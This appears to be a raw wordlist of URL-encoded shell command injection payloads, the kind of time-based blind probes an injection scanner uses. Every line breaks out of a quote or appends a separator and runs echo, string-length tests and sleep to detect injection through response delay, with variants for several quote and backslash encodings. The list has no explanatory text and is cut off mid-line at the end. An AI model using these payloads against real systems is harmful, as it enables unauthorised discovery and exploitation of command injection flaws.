D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20NBAQGO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%22%7C%20%5B%201%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%202%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%203%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%204%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%205%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%206%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%207%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%208%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%7C%20%5B%209%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NSNYEU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%0A%20str%3D%24%28echo%20PSDLXW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GRQQCI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%22%7C%20%5B%201%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%202%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%203%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%204%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%205%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%206%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%207%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%208%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%7C%20%5B%209%20-ne%20%24%28echo%20TIQLNL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FRMTBN%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%0A%20str%3D%24%28echo%20GZRNZB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20GJNRXW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%22%7C%20%5B%201%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%202%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%203%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%204%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%206%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%207%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%208%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%7C%20%5B%209%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ICRCGR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%0A%20str%3D%24%28echo%20NFJEZO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20BAQATA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%22%7C%20%5B%201%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%202%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%203%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%204%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%205%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%206%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%207%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%208%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%7C%20%5B%209%20-ne%20%24%28echo%20PMDMJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%2